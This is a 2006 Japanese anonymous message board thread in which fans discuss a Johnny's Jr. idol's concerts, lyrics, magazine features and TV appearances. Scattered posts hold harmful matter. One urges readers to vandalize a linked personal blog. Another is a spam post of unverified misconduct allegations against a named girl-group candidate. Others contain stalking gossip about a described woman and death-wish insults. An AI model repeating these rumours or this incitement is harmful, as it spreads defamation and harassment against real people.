イパーイ出まくりだから明日も楽しみにしてるよ

212 :ユーは名無しネ:2006/11/19(日) 18:28:38
goooooood 歌うし凸ウマーじゃん


213 :ユーは名無しネ:2006/11/19(日) 18:46:10
それ全員の曲じゃん

214 :ユーは名無しネ:2006/11/19(日) 19:05:54
長文愚痴のが感じ悪いがな

215 :ユーは名無しネ:2006/11/19(日) 19:07:34
gooooooooood


↑これにはいくつoがつくとか決まってるの?

216 :ユーは名無しネ:2006/11/19(日) 21:47:19
クレアクねぇ膨らんだ胸のカー
ブがってとこ歌うかな?
あれ萌えなんだけどな

217 :ユーは名無しネ:2006/11/19(日) 22:05:17
その歌詞が問題なら愛しのプレイガールとかもダメそうじゃん

218 :ユーは名無しネ:2006/11/19(日) 22:25:20
台場ではNGだったんだよな
あのフレーズでドチドチしたいのに

219 :ユーは名無しネ:2006/11/19(日) 23:15:20
凸が歌うとなぜかエロく聞こえないよな

220 :ユーは名無しネ:2006/11/19(日) 23:19:46
しかしエロくないとこがエロくて良いのです海老氏は

221 :ユーは名無しネ:2006/11/19(日) 23:24:48
あの部分を歌おうとすると最初のとこと交ざって
ねぇとんがった胸のカ-ブがになりそうになるのは
自分だけですかそうですか

222 :ユーは名無しネ:2006/11/20(月) 01:50:43
今この子オバにストカされてね?
元ズニアのストカしてたオバ。
KABAちゃんと貞子を足して2で割ったようなオバ。
自分、その元ズニア担で、かなり元ズニアが怒ってたっつー話を聞いたことがある。
声をかけるわけでもないらしいけど、尾行が激しいらしくて
しかも貞子似だから夜とか恐怖らしいよ。
ファンの子は貞子から守ってあげて。

223 :ユーは名無しネ:2006/11/20(月) 11:31:40
ハワイは少蔵SPだったのかな
あれで少蔵リハ出来なかったから今回出番少ないのかな

224 :ユーは名無しネ:2006/11/20(月) 12:27:41
今回出番多いよ
行けば分かる

225 :ユーは名無しネ:2006/11/20(月) 13:18:43
メドレーで歌うからでしょ
特別出番は多くはない

226 :ユーは名無しネ:2006/11/20(月) 13:25:19
ワロタ

227 :ユーは名無しネ:2006/11/20(月) 20:28:30
足とヒラメ苺がPだから凸おいしくなさそう

228 :ユーは名無しネ:2006/11/20(月) 21:21:21
来月1月放送分には海老氏たくさんでるんだろうね

229 :ユーは名無しネ:2006/11/20(月) 21:42:27
結局滝つつくのか木になる木

230 :ユーは名無しネ:2006/11/20(月) 21:44:53
シースルーでブルドッグだってww

231 :ユーは名無しネ:2006/11/20(月) 21:52:28
あらちの衣装か
もっとカバエエ曲歌わせてくれよ
海老氏には

232 :ユーは名無しネ:2006/11/20(月) 22:12:17
794 名前:ユーも名無しネ 投稿日: 2006/11/20(月) 21:53:08
少蔵からただいも
ホワイトクリスマスはヒラメ苺
サンタが町にやってくるは足急行
シンクリは海老氏
Ding-dongはとりん達からはじまりみんなで
パラダイス銀河は足
ブルドッグは海老氏
まいったネ今夜は急行
DAYBREAKはQ
抱き締めてトゥナイトはやすり
三味線ブギはいろいろ


233 :ユーは名無しネ:2006/11/20(月) 22:57:30
少蔵逝ってきたノシ
ブルドックは男の中の男って感じでカコヨスだったよ

234 :ユーは名無しネ:2006/11/20(月) 23:08:42
尻たたき魔凸面白かったよ
虫やら太陽やら叩いてた
オープニング虫がやたらなついててカバエエ兄弟だった


235 :sage:2006/11/20(月) 23:30:52
自分も逝ってきたノシ
やたら咳き込んでたのが気になる

236 :ユーは名無しネ:2006/11/20(月) 23:40:58
スマソorz間違えた
逝ってくる…

237 :ユーは名無しネ:2006/11/20(月) 23:47:44
咳してたズニアがむしろ気になる

238 :ユーは名無しネ:2006/11/21(火) 00:08:01
クレアクのねぇ膨らんだのとこを
ねぇとんがったって歌ってたんだが
単に間違えたのか?

239 :ユーは名無しネ:2006/11/21(火) 00:16:57
>238
大冒険の時もそうだったから多分変更になったのでは

240 :ユーは名無しネ:2006/11/21(火) 00:29:14
>239
d
あのフレーズ聞きたかったのに残念だ

241 :ユーは名無しネ:2006/11/21(火) 06:49:54
シンクリ(*´∀`*)楽しみだな

242 :ユーは名無しネ:2006/11/21(火) 08:14:23
クレアク歌詞カードも変更されてた

243 :ユーは名無しネ:2006/11/21(火) 09:09:41
女性自身すごい
タイトルはズニア特集になってるけどほぼ子猫特集だよ
紺写真も子猫イパーイ

244 :ユーは名無しネ:2006/11/21(火) 09:37:50
昨日の凸外はねでカバエかった
2時間たってエンディングにはバサバサだったけど

245 :ユーは名無しネ:2006/11/21(火) 10:28:19
>244
タモステと同じか
>243
新聞見たら凸が!
子猫ウマー!
買って来ます

246 :ユーは名無しネ:2006/11/21(火) 13:28:31
買ってキタ━━━━━━(゚∀゚)━━━━━━!!!
凸ウマーすぎ!
最初のページから前列℃アップだし次のページでもプロフ付きだしおいしすぎるwww
最後のページでもライブの写真ウマーだしもう1冊買うのケテーイ!

247 :ユーは名無しネ:2006/11/21(火) 14:44:01
$誌より良いよな
子猫すげー

248 :ユーは名無しネ:2006/11/21(火) 16:54:57
今思い出したんだがひらめきクイズのあと一度はけたんだが何故か戻ってきて
よく見たらクイズに使ったぬいぐるみをそのまま持ってはけたらしくスタッフに返してたよ(w

249 :ユーは名無しネ:2006/11/21(火) 16:59:53
自身て発売日いつのやつ?
こっちでは明日発売のでいいのかな?
今日確認してきたらまだ
11月28日号てのしかなかたorz
自分も℃アップのとつ拝めるか脳?

250 :ユーは名無しネ:2006/11/21(火) 17:47:44
(゚д゚)明日発売・・・
知らなくてさっき28日号の買って来てしまったorz

251 :ユーは名無しネ:2006/11/21(火) 17:51:37
>250
どこで買ったの?
書店であればレシート持ってって事情説明すれば返品できるよ

252 :ユーは名無しネ:2006/11/21(火) 17:54:20
>248
カバエエ

女性自身ってエリアによって発売日違うのか
あれ見るとすげーと思うと同時になんだか遠い存在になってしまった気分でチト悲しい・・
「Bigになる」って目標だし凸も将来の事を考えるようになったんだろうけど
万が一デブとかになったらもっと遠くなっちゃうのかなー
だがしかしこのままずっとCD出さない訳には逝かないからな。゚(゚´Д`゚)゚。

253 :ユーは名無しネ:2006/11/21(火) 18:10:20
>251
レシ-ト貰えないような近所の小さい本屋で買いますたorz
もうグランマにでもあげるか・・・

254 :ユーは名無しネ:2006/11/21(火) 18:24:34
凸癒し慧1とか書いてあるし先輩後輩からも好かれてるズニアって書いてあるし
いい事だらけ(゚∀゚)アヒャ


255 :ユーは名無しネ:2006/11/21(火) 19:10:04
毛逝にからかわれてる凸を見たい

256 :ユーは名無しネ:2006/11/21(火) 19:12:36
よく考えろ
もともと近い存在ではないだろ

257 :ユーは名無しネ:2006/11/21(火) 19:21:21
親しみやすいじゃん
ズニアでは凸が圧倒的に
受けとかあったし昔は余計にね

258 :ユーは名無しネ:2006/11/21(火) 19:27:48
凸ヤラ彩の移動先わかるヤシいる?

259 :ユーは名無しネ:2006/11/21(火) 19:28:09
凸のビッグ発言はPの「ビッグになってやるううう」発言と同じだよね
あんまりそういう具体的な事言わない人だと思ったから来年は本気なのか

260 :ユーは名無しネ:2006/11/21(火) 19:28:35
>257
どっか逝け

261 :ユーは名無しネ:2006/11/21(火) 19:34:57
>252
気持ちはよく分かるが
バック担になったからには仕方ナスな事だぞ

262 :ユーは名無しネ:2006/11/21(火) 19:42:46
最近※が変わってきたよね
やる気が出てきてる様子

263 :ユーは名無しネ:2006/11/21(火) 19:48:46
子猫に入って発言が積極的な方向に向かってる希ガス
やる気はありそう

264 :ユーは名無しネ:2006/11/21(火) 21:18:02
最近前向きだし明るくなったと思う
何か特別なこととかあったのかな

265 :ユーは名無しネ:2006/11/21(火) 22:05:54
昔も暗くなかったし別に明るくなったとは思わないwwwwwwwwwwwww
しかし凸以外の3人の髪色が茶髪というか金髪に近くて_
凸みたくあの程度の茶髪か黒髪にしてくれないか脳
茶髪軍団は足だけでいい
海老氏にはさわやかさがないと_

266 :ユーは名無しネ:2006/11/21(火) 22:18:07
>265
お前の存在が_

267 :ユーは名無しネ:2006/11/21(火) 22:36:55
歌ワラも新曲ついたみたいだね
子猫も大好きだけど海老氏でカツンのバックもまだまだやってほしいからウレシイ
メインとバック両方のユニにいれてウマー

268 :ユーは名無しネ:2006/11/22(水) 04:46:55
ヒコマロ担必死だね

269 :ユーは名無しネ:2006/11/22(水) 14:14:21
金台凸(子猫)ウマーですよ
ちょっとしたインタブみたいなのも載ってます

270 :ユーは名無しネ:2006/11/22(水) 16:45:23
269様dです
明日遠くの本屋まで買いに行きます

271 :ユーは名無しネ:2006/11/22(水) 23:12:19


272 :ユーは名無しネ:2006/11/23(木) 09:33:17
今更だけど滝つニューアルマムのユメモイントロのギターが
以前少蔵で凸が弾いてたのに似てるとオモーのは自分だけ?

273 :ユーは名無しネ:2006/11/23(木) 09:44:38
>272
似てるというか
あの部分を練習して弾いたんだと自分は思ってたが・・・

274 :ユーは名無しネ:2006/11/23(木) 10:21:45
>273
いや弾き方が似てると思ったんだよ
だって上手く聞こえな(ry

275 :ユーは名無しネ:2006/11/23(木) 15:42:41
resがつくときはどうして時間がたってないのにレスがつくの?自演?

276 :ユーは名無しネ:2006/11/23(木) 15:43:17
>269タソが情報教えてくれたのにお礼も言わないから自演だよね

277 :sage:2006/11/23(木) 19:06:40
269だけど
自演とか別にどうだってイイ明城付録の名鑑凸も激キャワ 恋は爆弾だって

278 :ユーは名無しネ:2006/11/23(木) 22:11:04
なにそれ

279 :ユーは名無しネ:2006/11/23(木) 22:13:25
安置だったのにresponseしてすまそ

しんできます
するーして下さい

280 :ユーは名無しネ:2006/11/23(木) 22:15:32
              ココから空気換えて


子猫でデブするように頑張らないと
升でもデブできるこの時代
来年は凸がデブするのを見届けないと
死ねない、絶対死ねない

281 :ユーは名無しネ:2006/11/23(木) 22:17:41
凸もドラマ出れないのか脳
舞台演技ばかりだとおおねになってマズー

282 :ユーは名無しネ:2006/11/23(木) 22:55:31
>281
おおねって何

283 :ユーは名無しネ:2006/11/23(木) 22:56:21
>282
下手って意味

284 :ユーは名無しネ:2006/11/23(木) 23:06:18
凸男はなー!
男は親の葬式でも泣いたらダメだぞ!
男の中の男になりたかったら強くなれ!

285 :ユーは名無しネ:2006/11/23(木) 23:15:15
凸の親亡くなったの?

286 :ユーは名無しネ:2006/11/24(金) 00:51:52
>280
別に子猫でデブとは限らないが
後半は禿同だ

287 :ユーは名無しネ:2006/11/24(金) 00:56:42
>280
最後の一行きもい
ヲバきもすぎる
凸可哀相

288 :ユーは名無しネ:2006/11/24(金) 01:16:06
升ですらって失礼じゃね?

289 :ユーは名無しネ:2006/11/24(金) 09:29:42
凸って地味地味って言われてるし無理やり石鹸ポジに例えると升かエロじゃない?
MCとか今はカトカンがやるんだろうしね

290 :ユーは名無しネ:2006/11/24(金) 10:22:27
凸演技普通に上手じゃん
ドラマでも大丈夫だとオモー
凸に今一番必要なのは自信だな羞恥心捨ててサラニがんがれ

291 :ユーは名無しネ:2006/11/24(金) 10:41:59
>283トン

292 :ユーは名無しネ:2006/11/24(金) 11:07:28
舞台演技じゃん、大袈裟な
平安みたいにドラマ出れなくなったら大変だよ

293 :ユーは名無しネ:2006/11/24(金) 11:48:30
くだらね
凸のドラマ決まってからそんな心配しろよ
凸のルックスにカブッテル俳優がもう既に数人いる
それが致命傷なんだなキット

294 :ユーは名無しネ:2006/11/24(金) 12:24:48
http://kjj-kuntalove.jugem.jp/
荒らしちゃいなよw

295 :ユーは名無しネ:2006/11/24(金) 12:30:09
はい逮捕者きた

296 :ユーは名無しネ:2006/11/24(金) 12:37:20
>294=295
個人スレ荒らすな死ね

>293
被ってるって桜なんとかの役?

297 :ユーは名無しネ:2006/11/24(金) 12:53:26
hの徹平タイプだな

298 :ユーは名無しネ:2006/11/24(金) 12:56:27
>296桜なんとかって何
カブッテル俳優
凸みたいなかわいい系背もあれぐらいの男優って他事務所に色々いるから
カエッテ某坊主キャラとか某純和風顔とかのがドラマオファー来るんじゃん個性ないとダメなんだろな

299 :ユーは名無しネ:2006/11/24(金) 13:41:46
安置きた
凸は172あるよ
エロは165

300 :ユーは名無しネ:2006/11/24(金) 18:48:25
敵味方もわかんないヤツはここ来ないで不愉快だ

301 :ユーは名無しネ:2006/11/24(金) 19:37:43
>300=298

302 :ユーは名無しネ:2006/11/24(金) 20:38:33
>301キラワレブ○コ

303 :ユーは名無しネ:2006/11/24(金) 22:01:24
荒れてるようだけど172はないよ170でしょ

304 :ユーは名無しネ:2006/11/25(土) 00:15:24
170以上あるね

305 :ユーは名無しネ:2006/11/25(土) 01:05:18
170以上はないよ
凸担は恐いよ

306 :ユーは名無しネ:2006/11/25(土) 03:05:51
>305
オマイ海老氏のどこが嫌いなの?
自分嫌いなヤシのスレなんて読まないよ
オマイキチガイだろ

307 :ユーは名無しネ:2006/11/25(土) 08:28:41
海老氏が嫌いっていうより
凸への僻みじゃない?
まあ何にせよ性格のいいヤシではないな

308 :ユーは名無しネ:2006/11/25(土) 10:50:21
ウタワラHPに新曲について書いてあったよ
やはりスタンドマイクで歌うらしい
そこに海老氏がつくのか

309 :ユーは名無しネ:2006/11/25(土) 11:50:17
凸には他のズニアにはない個性があるから強い
バックでは生き生きしてるし表情豊かは誰にも負けない
これは海老氏全員に言える事だけどね
個性がないと生き残れないからこの世界は

310 :ユーは名無しネ:2006/11/25(土) 12:02:15
>309
長文乙です

311 :ユーは名無しネ:2006/11/25(土) 12:06:23
凸担てキチガイ?

312 :ユーは名無しネ:2006/11/25(土) 13:09:41
携帯だからsageを間違えたスマソ

313 :ユーは名無しネ:2006/11/25(土) 13:24:35
氷点をよろポコ

314 :ユーは名無しネ:2006/11/25(土) 13:31:30
>313は海老氏スレも荒らしてる嵐
しかも全角アフォ

315 :ユーは名無しネ:2006/11/25(土) 14:05:08
マルチくらスルーしろよ

316 :ユーは名無しネ:2006/11/25(土) 14:33:29
オマイがするーしれ

317 :ユーは名無しネ:2006/11/25(土) 16:46:56
近代買ったよ
ハワイにいった事書いてあったけどあれ今月のハワイのことだよね?
いきなり書いてあっても驚くぜ

318 :ユーは名無しネ:2006/11/25(土) 16:47:36
2ページで写真もいいしウマーでした
海外ロケにも逝きたいって書いてあったよ
ハワイは海外ロケだったのか?

319 :ユーは名無しネ:2006/11/26(日) 01:02:52
凸ヤラ
ttp://p12.chip.jp/tayataya

320 :ユーは名無しネ:2006/11/26(日) 02:45:21
氷点見たら凄く面白くてエロの役なら凸も出来るとオモタ…なんて嘘だけど
早くドラマ出ないかなー
小僧ドラマにおまけつけてよ

321 :ユーは名無しネ:2006/11/26(日) 10:11:08
武道館紺凸ソロ歌いそう

322 :ユーは名無しネ:2006/11/26(日) 12:40:45
>321
当然

323 :ユーは名無しネ:2006/11/26(日) 13:00:24
今日はアミーゴでアップーーーーーーそこだけのために50分見てた自分

324 :ユーは名無しネ:2006/11/26(日) 17:04:34
凸担誰もいない
安置さえいないのは悲しい
自分だけの凸

325 :ユーは名無しネ:2006/11/26(日) 17:14:22
やっぱり凸カワユス☆癒されまくりだ( ^ー゚)b

326 :ユーは名無しネ:2006/11/26(日) 17:37:30
緑チャンと自分の2人だけで動かしてるみたいだよね。゚(゚´Д`゚)゚。
まぁいいや
自分だけの凸

327 :ユーは名無しネ:2006/11/26(日) 17:48:39
>324-326
ここにもいるぞノシ
だが阻止

328 :ユーは名無しネ:2006/11/26(日) 18:32:30
全部で三人だ

329 :ユーは名無しネ:2006/11/26(日) 19:20:03
静かに四人目ノシ

330 :ユーは名無しネ:2006/11/26(日) 20:26:19
ここ雑談じゃありませんから

331 :ユーは名無しネ:2006/11/26(日) 21:06:16
ウタワラキャワすぎた
笑顔が良かった
いつも笑顔だけど
YOUたちもキャワだったね

332 :ユーは名無しネ:2006/11/26(日) 21:45:44
腰振りエロいよね
凸ウマー
来週の予告もバッチリ

333 :ユーは名無しネ:2006/11/26(日) 21:46:30
ウタワラお爺さんの様なポーズで咳き込んでみせる凸ワロス
最後のパァもカバエかった

334 :ユーは名無しネ:2006/11/26(日) 22:28:40
YOU達のアミーゴダンシチレイだた
3回もまわってて凸らしかった

335 :ユーは名無しネ:2006/11/27(月) 17:54:44
オマイラ歌ワラBBSに海老氏をこれからも出して下さいとメールしる!
いくつかすでに載ってたぞ


336 :ユーは名無しネ:2006/11/28(火) 00:37:38
P日記によるとPが父さんに武道館で歌う曲を書くんだって(当然ゴーストライター
ということは新曲もやるみたいだけど凸にはソロ曲いまだにないのかな

337 :ユーは名無しネ:2006/11/28(火) 02:03:25
>335
オゲ

338 :ユーは名無しネ:2006/11/28(火) 11:02:37
明日付く?

339 :ユーは名無しネ:2006/11/28(火) 11:43:51
つく

340 :ユーは名無しネ:2006/11/28(火) 14:58:31
( ^ω^)

341 :ユーは名無しネ:2006/11/28(火) 15:35:50
足スレと海老氏スレ上げてるあらし

342 :ユーは名無しネ:2006/11/28(火) 16:09:06
( ^ω^)

343 :ユーは名無しネ:2006/11/28(火) 16:20:52
(・∀・)ネ!

344 :ユーは名無しネ:2006/11/28(火) 16:52:00
■■モー娘。8期最終候補者"奥村陽"に疑惑の影■■

↓疑惑の数々↓

・893系ヲタグループ「娘。組」構成員疑惑
・飲酒疑惑
・喫煙疑惑
・ヤンキー疑惑
・DQN疑惑
・年齢詐称疑惑
・不純異性交遊疑惑

詳しくは↓へ

ウィキ モー娘。8期最終候補者”奥村陽”疑惑まとめ
http://www21.atwiki.jp/okumurairane/pages/1.html

本スレ【飲酒】奥村の娘。入りを全力で阻止するスレ【喫煙】7
http://ex11.2ch.net/test/read.cgi/morningcoffee/1164625298/l50


345 :ユーは名無しネ:2006/11/28(火) 17:01:36
( ^ω^)

346 :ユーは名無しネ:2006/11/28(火) 17:42:23
( ^ω^)おっおっお

347 :ユーは名無しネ:2006/11/28(火) 18:05:22
(・∀・)イイ!

348 :ユーは名無しネ:2006/11/29(水) 00:56:32
>335
うぃ

349 :ユーは名無しネ:2006/11/29(水) 17:53:17
新曲ついてたキタ━━━━━━(゚∀゚)━━━━━━!!!


350 :ユーは名無しネ:2006/11/29(水) 19:59:30
>349
イミフ

351 :ユーは名無しネ:2006/11/29(水) 20:50:57
リハ映像映してたんだよ
5時代に

352 :ユーは名無しネ:2006/11/29(水) 22:06:46
新曲キテタね!禿ウレシス(w
今日の衣裳スチだ

353 :ユーは名無しネ:2006/11/29(水) 22:09:22
今日の衣装て?
何?

354 :ユーは名無しネ:2006/11/29(水) 22:10:37
リハ映像見逃したorz
どのくらい映り込んでましたか?

355 :ユーは名無しネ:2006/11/29(水) 22:13:43
思い出した!
一億三千万忘れてたorz

356 :ユーは名無しネ:2006/11/29(水) 22:19:32
>355
イ`

357 :ユーは名無しネ:2006/11/29(水) 22:27:25
リハはカツンだけで一分以上は映ってたかな
海老氏もちゃんと映ってた
いきなりだからビックリしたよ

358 :ユーは名無しネ:2006/11/29(水) 23:22:46
ベストアー観覧いってる間にリハ放送ってorz
キャワな凸が目の前で見れたからよしとしよう

359 :ユーは名無しネ:2006/11/30(木) 00:36:42
合間とかに誰かと話してた?

360 :ユーは名無しネ:2006/11/30(木) 00:55:58
w誌来月号子猫で載るよ
結成半年後を振り返るって
ハワイはw誌みたいだね
カレンダーも兼ねてるのかな

361 :      :2006/11/30(木) 03:43:52
     

362 :ユーは名無しネ:2006/11/30(木) 03:48:13
(((゜Д゜;)))

363 :ユーは名無しネ:2006/11/30(木) 09:10:52
( ^ω^)

364 :ユーは名無しネ:2006/11/30(木) 09:24:31
荒らしが分かりやすくてつまらない
嫌いなら見なきゃいいのに

ヒキーは死ね

365 :ユーは名無しネ:2006/11/30(木) 09:26:32
(・∀・)

366 :ユーは名無しネ:2006/11/30(木) 09:28:33
海老氏足関連荒してるの同一

367 :ユーは名無しネ:2006/11/30(木) 09:41:58
(・∀・)

368 :ユーは名無しネ:2006/11/30(木) 09:58:47
( ^ω^)

369 :ユーは名無しネ:2006/11/30(木) 10:10:23
(・∀・)ネ!

370 :ユーは名無しネ:2006/11/30(木) 10:11:00
ウッウー

371 :ユーは名無しネ:2006/12/01(金) 20:18:01
ニコラって雑誌にちょびっと凸載ってたよ


372 :ユーは名無しネ:2006/12/01(金) 21:11:22
>371
情報d
ちょびっとって写真だけ?

373 :ユーは名無しネ:2006/12/01(金) 21:35:13
ズニア紹介みたいな記事で紺写真と紹介文がチラッと

374 :ユーは名無しネ:2006/12/01(金) 21:45:06
>373
d!


375 :ユーは名無しネ:2006/12/01(金) 21:58:18
なんで自分が情報書いてもするーされて他の人がかくと一時間以内にレスされるんだろ
結構チェキしてるって分かったから何か書けばいいのに
意地悪だな

376 :ユーは名無しネ:2006/12/02(土) 17:05:54
意地悪っていわれてもわざとやってる訳じゃないと思うよ
誰が書いてるかなんてわからない訳だし

377 :ユーは名無しネ:2006/12/02(土) 17:14:03
375が誰かわからないからワザとじゃないよ
情報dです

378 :ユーは名無しネ:2006/12/02(土) 18:01:59
大した情報じゃないからだと思うよ

379 :ユーは名無しネ:2006/12/02(土) 19:07:02
375は性格に問題アリだな

380 :ユーは名無しネ:2006/12/02(土) 21:31:32
子猫面子

プラム→足ではセンター
毛逝→急行ではセンター
苺→鑢ではセンター
凸→海老氏では見切れ

何故凸だけがユニの中でセンターではないのに子猫に選ばれたのでしょうか
本来ならゐが選ばれてもいいはずです
だがしかし凸は人気があるからあえて見切れ位置なのに選ばれたのでしょう
海老氏では見切れでもショップ写真の数は鑢を抜いて足についで2番目に多い数です
要するに凸は恵まれた環境には決していなかったけど叩き上げでここまできたんです
来年のデブ組には絶対入らないと逝けません
凸自身も今までの凸とは違ってやる気がでてきたみたいなので来年が勝負の年です

381 :ユーは名無しネ:2006/12/02(土) 22:20:14
ほう


382 :ユーは名無しネ:2006/12/03(日) 06:54:13
見切れの位置もいいだよ
面白くて

383 :ユーは名無しネ:2006/12/03(日) 08:34:21
海老氏はセンターとかないじゃん
全員センター(w

384 :ユーは名無しネ:2006/12/03(日) 08:37:56
自分も見切れ凸スチだ

385 :ユーは名無しネ:2006/12/03(日) 10:04:41
そういう問題じゃなくて見切れにいるのになぜ子猫に選ばれたか?
って問題でしょ
頭悪いな

386 :ユーは名無しネ:2006/12/03(日) 13:06:52
それについては>380が解説してるから皆見切れ話の方向にいってんジャマイカ


387 :ユーは名無しネ:2006/12/03(日) 13:23:24
今日凸だけ歌なかったよ
来週はあるのかな


388 :ユーは名無しネ:2006/12/03(日) 14:57:58
なぜゐと蝉がセンターなんだ?

389 :ユーは名無しネ:2006/12/03(日) 15:10:11
ダンスが上手いから
まぁアクゴもしなやかで上手いけど
凸が1番ダンス上手くなくてアクロも苦手
だけど顔でカバー
顔とキャラが命の凸

390 :ユーは名無しネ:2006/12/03(日) 15:52:07
海老氏のビズ担当凸

391 :ユーは名無しネ:2006/12/03(日) 17:47:31
凸は海老氏に向いてなかったってことか
子猫はアクロやらなくていいし最高

392 :ユーは名無しネ:2006/12/03(日) 18:56:09
>391
フライハイで爆点するけどぐしゃぐしゃ
何故あんなに下手なのか不思議

今日のは黒スケスケシャツハダケてるあの1曲だけで満足だよwwwwww
まさかあんなにサービスしてるとはwwwwwww

393 :ユーは名無しネ:2006/12/03(日) 18:58:04
歌詞マジで変えられちゃって何か問題でもあったのかな


394 :ユーは名無しネ:2006/12/03(日) 20:08:44
チビズニアが想像してムラムラしちゃうから(w

395 :ユーは名無しネ:2006/12/03(日) 21:08:30
モエスな衣装ダタのに全然映らないし
マイク持たなくてもいいからバックで踊る姿が見たいのに。゚(゚´Д`゚)゚。

396 :ユーは名無しネ:2006/12/03(日) 21:41:03
今日の凸は大人の男っぽかった

397 :ユーは名無しネ:2006/12/03(日) 21:46:46
凸の体が1番たくましいからよかった

398 :ユーは名無しネ:2006/12/03(日) 22:20:09
YOUたちはキャワだったし少蔵はカコヨスだったし
ウタワラは一人衣装青系で特別な感じだったし
いい一日だ

399 :ユーは名無しネ:2006/12/03(日) 22:28:04
歌ワラそうだった?
暗くてよく分からなかった
一人だけ色違うの
見てみる

400 :ユーは名無しネ:2006/12/03(日) 22:34:34
スケスケ黒シャツの時少蔵見れなかったorz
腹筋の話してるとこは見たが
凸の腹筋はイイ感じダタ?

401 :ユーは名無しネ:2006/12/03(日) 22:47:11
仕事でまだ夕立しか見れてナスなんだけどフガフガしながら「知ってました!」とアピる凸カバエかた…

402 :ユーは名無しネ:2006/12/03(日) 23:04:58
夕立で笑顔で喋ってたの可愛い
凸は体鍛えてる風でちょうどいい感じ

403 :ユーは名無しネ:2006/12/03(日) 23:07:17
追加
変に腹筋が割れてなくて良かった

404 :ユーは名無しネ:2006/12/03(日) 23:32:47
>402-403
d!

405 :ユーは名無しネ:2006/12/03(日) 23:47:52
歌ワラ衣装音楽大運動会の赤VS青みたい
3対1で負けるの確実だったけど

406 :ユーは名無しネ:2006/12/04(月) 00:44:56
>405
3対1だって勝っちゃうに@円

407 :ユーは名無しネ:2006/12/04(月) 17:20:23
今週の凸のスケ

木曜日→うたばん(願望)
金曜日→タモステ(願望)
日曜日→夕立少蔵

408 :ユーは名無しネ:2006/12/04(月) 22:52:26


409 :ユーは名無しネ:2006/12/05(火) 00:40:54
凸凹

410 :ユーは名無しネ:2006/12/05(火) 01:29:53
>407
願望に期待ww

411 :ユーは名無しネ:2006/12/05(火) 21:35:20
明日関西の人、三氏にハワイが載ってるか教えて下さい
載ってないならハワイなんだったんだろ

412 :ユーは名無しネ:2006/12/05(火) 22:10:50
>411
ハワイはW誌と噂で聞いたケド…

413 :ユーは名無しネ:2006/12/05(火) 22:25:47
噂じゃなくて波の予告にはハワイズニアと載ってるけど海老氏とは書いてないんだよね
1誌のためにわざわざハワイなんて行くのかな
とりんは学校休ませてるしずいぶん豪勢だよね

414 :ユーは名無しネ:2006/12/06(水) 00:05:58
P誌の予告に海老氏だけ載ってない
今月から載らなくなったのかな
かなり気になる

415 :ユーは名無しネ:2006/12/06(水) 12:37:20
ワイハ行ったのに載らないってイミフ

416 :ユーは名無しネ:2006/12/06(水) 21:22:36
23日裸の少年出演だって

417 :ユーは名無しネ:2006/12/06(水) 21:34:17
>416
d
楽しみすぎてドチドチしてきた


418 :ユーは名無しネ:2006/12/06(水) 21:40:27
>416
d
誰とでるの?

419 :ユーは名無しネ:2006/12/06(水) 22:28:08
風だって
三誌のどれかに載ってるって

420 :ユーは名無しネ:2006/12/06(水) 22:30:19
片目誌だよ

421 :ユーは名無しネ:2006/12/06(水) 22:31:37
風じゃアイシの一人舞台だな
凸ニヤニヤして座ってるだけか

422 :ユーは名無しネ:2006/12/06(水) 22:35:06
みんなd
風じゃ一言もしゃべらなそうだな

423 :ユーは名無しネ:2006/12/06(水) 22:43:29
湘南で無邪気にはしゃぐ凸
ナツカシ

424 :ユーは名無しネ:2006/12/06(水) 22:47:22
古紙と誰だっけ
忘れた
トークは風にまかせていいよ
ニコニコしてればおk

425 :ユーは名無しネ:2006/12/06(水) 22:49:45
>424
ハセ
あれは楽しかったよ

426 :ユーは名無しネ:2006/12/06(水) 22:55:01
そうだった
ハセね
まだちびだったね

427 :ユーは名無しネ:2006/12/06(水) 23:03:08
今日はイーッパイ思い出作ろうね
          カメラの凸

428 :ユーは名無しネ:2006/12/06(水) 23:08:23
昔の裸は充実してたよね
ロケの他スタジオでもトークあったし
それが今じゃ・・

429 :ユーは名無しネ:2006/12/06(水) 23:12:26
またでるようになっただけいいじゃないの

430 :ユーは名無しネ:2006/12/06(水) 23:18:21
今の裸なら百式がいいかな
ミニミニドラマやるし

431 :ユーは名無しネ:2006/12/06(水) 23:19:36
夏の王様でチビ凸発見

432 :ユーは名無しネ:2006/12/06(水) 23:32:15
昔はシャカリキだったね

433 :ユーは名無しネ:2006/12/06(水) 23:59:38
凸どのへんにいましたか?

434 :ユーは名無しネ:2006/12/07(木) 00:03:46
>433
1番後ろのセンターあたり
今の窓面とか前列にうじゃうじゃいたよ
あとからロとかITとか白い衣装ででてきた

435 :ユーは名無しネ:2006/12/07(木) 00:15:44
詳しくありがとうございました

436 :ユーは名無しネ:2006/12/08(金) 09:13:57
めざましテレビの見切れ凸キャワ

437 :ユーは名無しネ:2006/12/08(金) 12:56:52
やはり黒髪最強

438 :ユーは名無しネ:2006/12/08(金) 13:54:27
いつも礼儀正しい凸でありました


439 :ユーは名無しネ:2006/12/08(金) 14:21:31
2時っチャオでも見切れてる凸キャワ
黒髪最強!!

440 :ユーは名無しネ:2006/12/08(金) 14:36:52
見逃した・・・orz

441 :ユーは名無しネ:2006/12/08(金) 15:36:05
>440
5時はリアルタイム、6時はヌースの森、0時代はヌースゼロがあるよ

442 :ユーは名無しネ:2006/12/08(金) 15:56:05
>441
d!

443 :ユーは名無しネ:2006/12/08(金) 18:45:28
>437、439
黒髪…??

444 :ユーは名無しネ:2006/12/08(金) 19:00:01
みんな揃って黒髪


445 :ユーは名無しネ:2006/12/08(金) 21:04:06
ゐは黒髪じゃなかったよな

446 :ユーは名無しネ:2006/12/08(金) 21:14:17
ゐだけかなりの茶髪
プラムも黒髪にしたし
また黒髪流行るかな

447 :ユーは名無しネ:2006/12/08(金) 21:59:26
ヤパ-リ黒髪の凸が(^∀^)イイ!!

448 :ユーは名無しネ:2006/12/08(金) 22:02:42
個人的に
凸はイマドキの子に
ならないほうがいいんだな

イコール黒髪最強てことか

449 :ユーは名無しネ:2006/12/08(金) 22:04:10
>448
スマソ
sage忘れた

450 :ユーは名無しネ:2006/12/08(金) 22:32:40
プラムも人に茶髪すすめといて
自分は黒髪ってひでえええええ
まぁ凸の顔は地味慧だから黒髪が最強
プラムも黒髪の方が清潔感がでてていいよ


451 :ユーは名無しネ:2006/12/08(金) 22:37:45
>448
ならん方がええ
流行りっぽい髪形ばかりの中オーソドックス寄りで新鮮
眉も太めナツラルを整えた程度で良い


452 :ユーは名無しネ:2006/12/08(金) 23:09:32
黒髪にきのこ頭の凸が
大好きだ

453 :ユーは名無しネ:2006/12/08(金) 23:27:43
